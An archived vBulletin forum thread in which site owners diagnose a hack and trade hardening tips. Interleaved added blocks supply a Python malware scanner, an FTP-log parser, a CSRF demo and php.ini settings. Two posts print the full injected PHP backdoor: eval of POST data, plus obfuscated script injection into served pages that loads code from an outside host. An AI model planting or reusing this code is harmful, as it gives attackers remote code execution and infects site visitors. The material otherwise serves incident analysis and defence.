vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Forum and Server Management (https://vborg.vbsupport.ru/forumdisplay.php?f=232)
-   -   HACKED - Make sure you are secure (https://vborg.vbsupport.ru/showthread.php?t=210273)

StructuralNet 04-04-2009 04:38 AM

HACKED - Make sure you are secure
 
Okay guys, I was out to dinner before and came back and loaded my site, http://www.theangryforum.com to see a PHP error syntax on line 1...

I open up my index file and find this:

Code:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzN1VXY24wY3JHU1ppcHQlMjBGbjdzcmloTGMlM0QlMkYlMkY3VVc5NCUyRTI0MkVpN29MRCUyRTIlMkVRTTMxbjBjOTUlMkZqb0xEcVFNM3VlN1VXcjdVV3lvN0QlMkVqc0ZuNyUzRUdTWiUzQ2loTCUyRlFNM3NjbjBjcjJFaWlwdCUzRScpLnJlcGxhY2UoL283RHxHU1p8aWhMfDdVV3xvTER8Rm43fG4wY3xRTTN8MkVpL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

This was dumped on a crap load of my files. The file structure was not 777 for these files either, and I do not know how this was injected in. My database was not touched, but I had to delete the installation of VB and install a fresh install and connect to the database.

I did some research on this, and results are slim, but it's attacking other programs as well. osCommerce for example:

http://forums.oscommerce.com/lofiver...p?t321418.html

Anyone see this before?

I was more in panic to get my site up, now that I DO have a copy of all of my files and backups, if this hits again I will investigate the source further, possibly copy the whole structure and send it to VB or what ever can be done.
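What the injected prefix above actually does, read from the code itself: `tmp_lkojfghx2` walks the existing output buffers and restarts them under `tmp_lkojfghx` as the `ob_start` callback, and it is also installed as the error handler so the hook is re-armed on any PHP warning; the callback inflates gzipped output if needed, strips any earlier copy of itself, and inserts whatever `TMP_XHGFJOKL` decodes to in front of `<body>`. Independently of that, `eval($_POST['tmp_lkojfghx3'])` is a plain remote-code-execution backdoor reachable through every file that carries the prefix, which is why re-installing the application was the right call. The Python below is an added triage helper, not code from this thread or from vBulletin: it flags those indicators in a PHP source string and unwinds the base64, then the `document.write(unescape(...).replace(/junk/g,""))` stage, to show the tag that gets written into every served page. For the blob in the post it is a single external `<script src=...>` pointing at a bare IP address. The base64 blob is copied verbatim from the post; the PHP sample is a constructed, shortened copy of the prefix with the same indicators.

```python
"""Triage helper for the injected PHP prefix shown above.

Added example, not code from the thread or from vBulletin. It flags the
indicators this infection leaves in a file and unwinds the
base64 -> document.write(unescape(...).replace(/junk/g, "")) chain to
reveal the HTML the output-buffer callback injects into every page.
"""
import base64
import re
from urllib.parse import unquote

# Indicators of this family. The first two are generic enough to catch
# re-obfuscated variants whose function names have been changed.
INDICATORS = {
    "eval_of_request_data": re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\["),
    "base64_constant": re.compile(r"define\s*\(\s*'[A-Z_]+'\s*,\s*base64_decode\s*\("),
    "ob_callback": re.compile(r"ob_start\s*\(\s*'tmp_[a-z0-9]+'\s*\)"),
    "error_handler_hook": re.compile(r"set_error_handler\s*\(\s*'tmp_[a-z0-9]+2'\s*\)"),
    "tmp_dropper": re.compile(r"'/tmp/m'\s*\.\s*\$i"),  # the /tmp/m1 .. /tmp/m99 loader variant
}


def scan_php(source: str) -> list[str]:
    """Names of the indicators present in a PHP source string (empty if clean)."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def extract_b64(source: str) -> str:
    """The base64 argument of define('TMP_...', base64_decode('...')) in the prefix."""
    m = re.search(r"base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)", source)
    if not m:
        raise ValueError("no base64_decode() literal found")
    return m.group(1)


# Stage 2 is JavaScript of the form
#   document.write(unescape('%3Cs7UW...').replace(/o7D|GSZ|.../g,""));
_STAGE2 = re.compile(r"unescape\('([^']*)'\)\.replace\(/([^/]*)/g,\s*\"\"\)", re.S)


def decode_payload(b64: str) -> str:
    """Return the HTML that stage 2 would document.write() into the page."""
    js = base64.b64decode(b64).decode("ascii", "replace")
    m = _STAGE2.search(js)
    if not m:
        raise ValueError("unrecognised stage-2 layout")
    escaped, junk = m.groups()
    # unescape() is %XX decoding; the global replace removes the junk tokens
    # sprinkled into the string to defeat naive grep signatures.
    return re.sub(junk, "", unquote(escaped))


# Verbatim base64 from the first post of this thread.
SAMPLE_B64 = (
    "PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVu"
    "ZXNjYXBlKCclM0NzN1VXY24wY3JHU1ppcHQlMjBGbjdzcmloTGMlM0QlMkYlMkY3VVc5"
    "NCUyRTI0MkVpN29MRCUyRTIlMkVRTTMxbjBjOTUlMkZqb0xEcVFNM3VlN1VXcjdVV3lv"
    "N0QlMkVqc0ZuNyUzRUdTWiUzQ2loTCUyRlFNM3NjbjBjcjJFaWlwdCUzRScpLnJlcGxh"
    "Y2UoL283RHxHU1p8aWhMfDdVV3xvTER8Rm43fG4wY3xRTTN8MkVpL2csIiIpKTsKIC0t"
    "Pjwvc2NyaXB0Pg=="
)

# Constructed, shortened copy of the injected prefix (same indicators, no body).
SAMPLE_PHP = (
    "<?php if(!function_exists('tmp_lkojfghx')){"
    "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
    "if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('" + SAMPLE_B64 + "'));"
    "function tmp_lkojfghx($s){return $s;}function tmp_lkojfghx2(){ob_start('tmp_lkojfghx');}}"
    "if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;"
    "tmp_lkojfghx2(); ?>"
)

if __name__ == "__main__":
    print("indicators:", scan_php(SAMPLE_PHP))
    print("injected  :", decode_payload(extract_b64(SAMPLE_PHP)))
```

Run `scan_php` over every `.php`, `.html` and `.js` file in the webroot rather than only `index.php`: the post says the prefix was dumped on a large number of files, and the FTP log later in the thread shows it was written into an arcade template and a database class too. The decoded `src` host is the thing to block at the egress proxy and to search for in the web server logs while the site was serving it.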

Dismounted 04-04-2009 05:33 AM

Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

StructuralNet 04-04-2009 02:41 PM

Quote:

Originally Posted by Dismounted (Post 1783527)
Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

I am contacting my host right now, I am on a VPS and I have been checking the server logs for anything weird, but I think my admin is better to find something if there is something..

I would have thought, though, that if they got into the server through a backdoor or something, they would have affected my other accounts. I have VB running on another account for another site, and a few other accounts with various programs that were not touched (and have been on there for a very long time).

Here is the list of my mods,

I have ibProArcade v.2.6.8 which this file structure was changed I noticed.

Here is a list of my other mods:

Admin Log In As User

Cyb - Advanced Permissions Based on Post Account

Fake User (adds a couple guests)

GTSmilieBox

Panic Button

Plus Mood

vB Ad Management

vBadvanced CMPS

vbSEO Site Map

Welcome Headers

--------------- Added 04-05-2009 07:05 AM ---------------

Maybe someone can chime in?

This guy is getting FTP access, I have formatted all my pcs to make sure I don't have a virus, and my host is looking through everything as well.

Things that caught my interest:


Sat Apr 04 17:14:52 2009 0 81.17.252.160 6448 /home/theangry/public_html/arcade/cat_imgs/index.html a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:53 2009 0 81.17.252.160 6699 /home/theangry/public_html/arcade/cat_imgs/index.html a _ i r theangry ftp 1 * c
Sat Apr 04 17:14:54 2009 0 81.17.252.160 22447 /home/theangry/public_html/arcade/functions/dbclass.php a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:55 2009 0 81.17.252.160 24228 /home/theangry/public_html/arcade/functions/dbclass.php a _ i r theangry ftp 1 * c


Why the arcade first? Compromised maybe? I deleted the folder when I did a backup, I also disabled my FTP server...
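Those four lines are in xferlog format: the five date tokens, then transfer seconds, client address, byte count, server path, transfer type, special-action flag, direction (`o` = sent out to the client, `i` = received from the client), access mode, user name, service, authentication fields and completion status. Read that way, the log shows each file being downloaded and then uploaded again one second later from the same address with a larger byte count, which is what an automated tool working with a valid FTP password looks like, not a server-side exploit. The parser below is an added example, not from the thread; the sample log is the four posted lines verbatim and the allow-list address it is compared against is an assumption.

```python
"""Parse FTP transfer-log (xferlog) lines like the four above and flag the
fetch-modify-push pattern they show. Added example, not from the thread; the
sample log is the posted lines, the allow-list address is an assumption."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime


@dataclass
class Transfer:
    when: datetime
    host: str       # client address
    size: int       # bytes transferred
    path: str       # server-side file name
    direction: str  # 'o' = sent to the client (download), 'i' = received (upload)
    user: str


def parse_xferlog(text: str) -> list[Transfer]:
    """xferlog field order: weekday mon day time year, transfer-seconds, host,
    size, path, type, special-flag, direction, access-mode, user, service,
    auth-method, auth-id, completion-status (file names never contain spaces)."""
    out = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 14:
            continue
        when = datetime.strptime(" ".join(f[:5]), "%a %b %d %H:%M:%S %Y")
        out.append(Transfer(when, f[6], int(f[7]), f[8], f[11], f[13]))
    return out


@dataclass
class Rewrite:
    host: str
    user: str
    path: str
    seconds_between: float
    size_before: int
    size_after: int


def find_rewrites(transfers, window_seconds=60):
    """Same client downloads a path and uploads it again within the window:
    the signature of a tool that fetches a file, injects into it, pushes it back."""
    by_key = defaultdict(list)
    for t in transfers:
        by_key[(t.host, t.path)].append(t)
    found = []
    for (host, path), items in by_key.items():
        items.sort(key=lambda t: t.when)
        for a, b in zip(items, items[1:]):
            gap = (b.when - a.when).total_seconds()
            if a.direction == "o" and b.direction == "i" and gap <= window_seconds:
                found.append(Rewrite(host, b.user, path, gap, a.size, b.size))
    return found


def uploads_from_unknown_hosts(transfers, allowed_hosts):
    """Every upload whose client address is not one the site owner recognises."""
    return [t for t in transfers if t.direction == "i" and t.host not in allowed_hosts]


# The four lines from the post above, verbatim.
SAMPLE_LOG = """\
Sat Apr 04 17:14:52 2009 0 81.17.252.160 6448 /home/theangry/public_html/arcade/cat_imgs/index.html a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:53 2009 0 81.17.252.160 6699 /home/theangry/public_html/arcade/cat_imgs/index.html a _ i r theangry ftp 1 * c
Sat Apr 04 17:14:54 2009 0 81.17.252.160 22447 /home/theangry/public_html/arcade/functions/dbclass.php a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:55 2009 0 81.17.252.160 24228 /home/theangry/public_html/arcade/functions/dbclass.php a _ i r theangry ftp 1 * c
"""

if __name__ == "__main__":
    events = parse_xferlog(SAMPLE_LOG)
    for r in find_rewrites(events):
        print(f"{r.host} rewrote {r.path} ({r.size_before}->{r.size_after} bytes, "
              f"{r.seconds_between:.0f}s apart)")
    for t in uploads_from_unknown_hosts(events, allowed_hosts={"203.0.113.5"}):
        print(f"upload from unknown host {t.host}: {t.path}")
```

The byte deltas (+251 and +1781) give a rough size of what was inserted into each file, and the user field answers the "why this account" question: the tool logged in as `theangry`, so it had that account's FTP password, which is the credential to rotate first.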

TECK 04-05-2009 11:28 AM

It is related to your server administration; you did not do anything wrong, nor did your products...
In short, it is a base64-encoded fake yahoo counter script that is injected into HTML code. The script looks for files into server’s temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell into your insecure server.
Personally, I would change host. It is obvious they don't care about security.

StructuralNet 04-05-2009 07:42 PM

Quote:

Originally Posted by TECK (Post 1784220)
It is related to your server administration; you did not do anything wrong, nor did your products...
In short, it is a base64-encoded fake yahoo counter script that is injected into HTML code. The script looks for files into server's temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell into your insecure server.
Personally, I would change host. It is obvious they don't care about security.

Yea, I agree with you - because I have been going crazy formatting my machines to make sure I had no key loggers on it, etc.

The host has been working around the clock to find the security hole and try to fix it, so I am going to give him a few days to see if he can close up the hole, if not I am off. I can't have this jeopardize not only my websites on the server, but my clients that I host as well.

Considering it is a VPS, I have multiple accounts on there including another site for VB.. why is this guy going on after this site?

TECK 04-06-2009 08:11 AM

The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non-root access to a dedicated server. For example, I could set a file with extension .gif that in fact is this script:
PHP Code:

<?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

It is widely used as a smilie that looks like a broken image when viewed (the PHP script executes).

Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all the files needed to inject the above code into each page on your site. As I said before, change the host. It is not your fault or the vBulletin developers' if your host runs unsecured boxes.

StructuralNet 04-06-2009 06:28 PM

Quote:

Originally Posted by TECK (Post 1784897)
The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non-root access to a dedicated server. For example, I could set a file with extension .gif that in fact is this script:
PHP Code:

<?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output 
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

It is widely used as a smilie that looks like a broken image when viewed (the PHP script executes).

Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all the files needed to inject the above code into each page on your site. As I said before, change the host. It is not your fault or the vBulletin developers' if your host runs unsecured boxes.

Yea,

I agree - I took your advice and moved - I can't let this sit over my head :erm:

BSMedia 04-06-2009 07:35 PM

If you're on a VPS, chances are good that security and management rely on you or your server admin.

Your server security is only as secure as your least secure admin/server manager.

mykes 04-08-2009 11:31 AM

Unfortunately, I don't see how a vb3 site (or many others) can be truly secure at this point.

All a hacker really needs to do is post something like "hey, look at this really awesome thing" with a link to his own server where he controls the HTML and javascripts.

In his HTML there, all he needs is an img tag with src= any url at your vb3 site and he accesses that URL logged in as the unsuspecting user. Stupid browsers send cookies to your site on an img request.

img isn't the only tag, either, script tags work, too, as do css (link) tags, and a few others.

Dismounted 04-09-2009 04:06 AM

That's why vBulletin introduced CSRF protection. ;)
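The check behind that one-liner, as an added example that is not vBulletin's code and not part of the original thread: the browser attaches the session cookie to the `<img>` request mykes describes, so the cookie alone cannot prove the user meant to do anything. A token that is bound to the session and only ever embedded in pages served to that browser closes the gap, because the attacker's page cannot read it. The session store, the secret and the handler below are constructed; vBulletin's own implementation differs in detail, but its hidden form field is also named `securitytoken`.

```python
"""How a per-session security token stops the <img src=...> attack described
above. Added example, not vBulletin code; vBulletin's own implementation
differs in details, but the check has the same shape."""
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)      # per-installation secret (assumption)
SESSIONS = {"sess-alice": {"userid": 42}}    # constructed session store


def security_token(session_id: str) -> str:
    """Token bound to the session. An attacker's page never sees it: it is only
    embedded in pages served to the logged-in browser, and same-origin policy
    keeps other sites from reading those pages."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def render_form(session_id: str) -> str:
    """The hidden field a legitimate form carries (vBulletin calls it securitytoken)."""
    return f'<input type="hidden" name="securitytoken" value="{security_token(session_id)}">'


def delete_post(method: str, cookies: dict, form: dict):
    """State-changing handler. Returns (http_status, message)."""
    sid = cookies.get("sessionhash")
    if sid not in SESSIONS:
        return 401, "not logged in"
    if method != "POST":                       # <img>, <script>, <link> can only issue GET
        return 405, "state change requires POST"
    expected = security_token(sid)
    if not hmac.compare_digest(form.get("securitytoken", ""), expected):
        return 403, "missing or wrong security token"
    return 200, f"deleted by user {SESSIONS[sid]['userid']}"


# Scenarios. In all three the victim's browser attaches the cookie.
VICTIM_COOKIES = {"sessionhash": "sess-alice"}


def img_tag_attack():
    # <img src="https://forum.example/editpost.php?do=deletepost&p=1"> on the attacker's page
    return delete_post("GET", VICTIM_COOKIES, {})


def auto_submit_form_attack():
    # attacker's page auto-submits a cross-site POST; cookie goes along, token is unknown
    return delete_post("POST", VICTIM_COOKIES, {"do": "deletepost", "p": "1"})


def legitimate_submit():
    form = {"do": "deletepost", "p": "1", "securitytoken": security_token("sess-alice")}
    return delete_post("POST", VICTIM_COOKIES, form)


if __name__ == "__main__":
    print(render_form("sess-alice"))
    for name, fn in (("img tag", img_tag_attack), ("auto-submit form", auto_submit_form_attack),
                     ("legitimate", legitimate_submit)):
        print(f"{name:17s} -> {fn()}")
```

Two things follow for the mods discussion further down: every form a mod adds must carry and verify the token, not only the core's forms, and no state change may be triggered by a GET, because GET is exactly what an image, script or stylesheet tag can fire.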

mykes 04-09-2009 11:17 AM

Quote:

Originally Posted by Dismounted (Post 1787083)
That's why vBulletin introduced CSRF protection. ;)

Indeed. It's a good reason to always keep your vb3 up to date, version-wise (to get these kinds of fixes). Though installed hacks and mods that don't have CSRF built in are giant security holes.

Two mods I'd love to see, but haven't found here are:

1) Allow trusted users (e.g. by user group) to post HTML in forums. Right now, you can turn on HTML in one or more forums, but globally for all users.
2) Fix the HTML posting so it strips out script tags and other potentially malicious things (img with src=something.php?args - get rid of ?args)

Dismounted 04-09-2009 11:52 AM

Quote:

Originally Posted by mykes (Post 1787273)
img with src=something.php?args - get rid of ?args

vBulletin already allows for this, inside vBulletin Options.

StructuralNet 04-09-2009 06:56 PM

I guess the same would go with this code then? Looks like an
Code:

<html><body><script>alert('SwZNd');</script></body></html>

I found that in a PNG file on one of my clients accounts, along with a .zip file and a full directory of helpdesk software, along with a new database for that program.

Dismounted 04-10-2009 03:44 AM

Anything that looks like that generally isn't good. ;)

StructuralNet 04-10-2009 10:42 AM

Quote:

Originally Posted by Dismounted (Post 1787919)
Anything that looks like that generally isn't good. ;)

Yuppp... I found that in a PNG file on two of my clients sites. Their sites have been running well over a year now for no problem, but as soon as I changed hosts it hit the fan. One of the programs installed a helpdesk on their account, even had access to mysql.

What does that code do, pretty much the same as above? Access a file in tmp to get non-root access?

Dumped that host like it's hot.

Dismounted 04-10-2009 11:25 AM

The code above doesn't do anything. It's just "test" script.

StructuralNet 04-10-2009 01:39 PM

Quote:

Originally Posted by Dismounted (Post 1788150)
The code above doesn't do anything. It's just "test" script.

Well somehow that image and that helpdesk were installed on the same day.. That site was open for at least a year - 2 weeks after I moved to a new host is when my vb forum got hacked and my clients' sites were hacked..

No security at all apparently..

|Jordan| 04-12-2009 05:19 AM

How do you secure the tmp dir ? chown it?

Angel-Wings 04-12-2009 07:45 PM

Quote:

Originally Posted by |Jordan| (Post 1789425)
How do you secure the tmp dir ? chown it?

Simple answer - use a different temp dir than the default /tmp one, chown / chmod that one and make sure anything active (PHP, SSI) isn't active there.
Related to the VPS issue and the "It's up to you" statement - that's only partially right. VPS run inside a virtual environment and if the hoster doesn't care about security updates it's possible - hard but possible - to break out from a VPS on the real server and from there, well, you can do everything.
Back to the "tmp dir" - set in php.ini a tempdir, outside the webroot of course and ensure your Webserver doesn't serve that directory.
And related to this base64 - I highly recommend reading some manuals about a "secure as possible" PHP setup. Just because it's set in the default php.ini, it doesn't mean it's good to be kept ;)

|Jordan| 04-13-2009 02:58 AM

Quote:

Originally Posted by Angel-Wings (Post 1789757)
Simple answer - use a different temp dir than the default /tmp one, chown / chmod that one and make sure anything active (PHP, SSI) isn't active there.
Related to the VPS issue and the "It's up to you" statement - that's only partially right. VPS run inside a virtual environment and if the hoster doesn't care about security updates it's possible - hard but possible - to break out from a VPS on the real server and from there, well, you can do everything.
Back to the "tmp dir" - set in php.ini a tempdir, outside the webroot of course and ensure your Webserver doesn't serve that directory.
And related to this base64 - I highly recommend reading some manuals about a "secure as possible" PHP setup. Just because it's set in the default php.ini, it doesn't mean it's good to be kept ;)

Chown it as a different user other than root?

Dismounted 04-13-2009 04:37 AM

Quote:

Originally Posted by |Jordan| (Post 1789965)
Chown it as a different user other than root?

Ideally, a user just dedicated to PHP (with locked down permissions). Also have a look at upload_tmp_dir (you may want to change this as well, although it is not necessary).
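The settings the last three replies refer to, collected into one php.ini fragment. This is an added example, not configuration from the thread or shipped with vBulletin; every path is an assumption for a Linux box and has to be created first, outside the webroot, owned by the PHP user, mode 0700, and never mapped by the web server.

```ini
; Added example for the temp-directory advice above; not from the thread or vBulletin.
; Every path is an assumption: create it outside the webroot, owned by the PHP user,
; mode 0700, and make sure no <Directory>/Alias ever serves it.
upload_tmp_dir    = /var/lib/php/upload_tmp  ; uploads land here before move_uploaded_file()
session.save_path = /var/lib/php/sessions    ; session files out of the shared /tmp as well
sys_temp_dir      = /var/lib/php/tmp         ; PHP 5.5+: default for tempnam()/tmpfile()/sys_get_temp_dir()
open_basedir      = /var/www/vb:/var/lib/php ; PHP may open files only under these trees
allow_url_include = Off                      ; include()/require() of a remote URL is never legitimate
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,dl
expose_php        = Off
display_errors    = Off                      ; errors go to the log, not into served pages
```

The point of a dedicated directory is not the name; it is that only the PHP user can write there and that nothing in that directory is ever reachable by URL, so a file dropped into it cannot be executed by requesting it. `open_basedir` is what stops a script elsewhere on a shared box from reading or including what lands there.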

Brother Malachi 04-20-2009 08:11 PM

Sorry for reviving this old thread but how can I know if my site is compromised?

tipoboy 04-20-2009 09:48 PM

Quote:

Originally Posted by hammerhead24 (Post 1795473)
Sorry for reviving this old thread but how can I know if my site is compromised?

usually if you keep your bulletin board up to date, you're pretty safe

Dismounted 04-21-2009 09:17 AM

You don't really know until it's too late. However, as mentioned above, keeping your software as up to date as possible will reduce this risk.

Brother Malachi 04-21-2009 11:33 PM

What about the tmp folder?

Dismounted 04-22-2009 06:55 AM

What about it? As long as you keep PHP's temp directory secured, you should be fine.

Brother Malachi 04-22-2009 08:19 PM

What I meant was how do I know if the /tmp/ folder is not secured?

TECK 05-01-2009 02:33 AM

Quote:

Originally Posted by |Jordan| (Post 1789425)
How do you secure the tmp dir ? chown it?

The hacker does not use a /tmp dir, to hack your forum. He takes advantage of your 0777 chmoded dirs in vB to screw you nice.
I posted this issue long time ago but people thought I'm crazy. I even wrote a tutorial on this site how to secure vB... Put it this way: You have a 0777 dir into your /var/www/html (or whatever is the web root)? You can be hacked, very easy.

Read this article I wrote long time ago... probably nobody read it.
Then secure the same way the current 0777 dirs, not just the config file. Chmod them to 0750 and own them by nologinuser:root.

chloe101 07-27-2009 08:02 PM

Quote:

Originally Posted by TECK (Post 1802240)
The hacker does not use a /tmp dir, to hack your forum. He takes advantage of your 0777 chmoded dirs in vB to screw you nice.
I posted this issue long time ago but people thought I'm crazy. I even wrote a tutorial on this site how to secure vB... Put it this way: You have a 0777 dir into your /var/www/html (or whatever is the web root)? You can be hacked, very easy.

Read this article I wrote long time ago... probably nobody read it.
Then secure the same way the current 0777 dirs, not just the config file. Chmod them to 0750 and own them by nologinuser:root.

Thank you!

knucklenitz 09-25-2009 04:20 AM

Teck-

Just to make sure I understand, moving the config.php to another directory out of the public html will not affect vb operation?

I was just hacked yesterday and confirmed that it was some sort of database insertion, based on that when I restored a backup database, the hack was cleared. I wasn't able to find any files with changed dates.

Is there some other way, other that the hacker breaking the config.php that they could manipulate the database?

Note that I also have htaccess on all pertinent directories.

Thanks!

Paul M 09-25-2009 10:26 AM

Quote:

Originally Posted by knucklenitz (Post 1890282)
Is there some other way, other that the hacker breaking the config.php that they could manipulate the database?

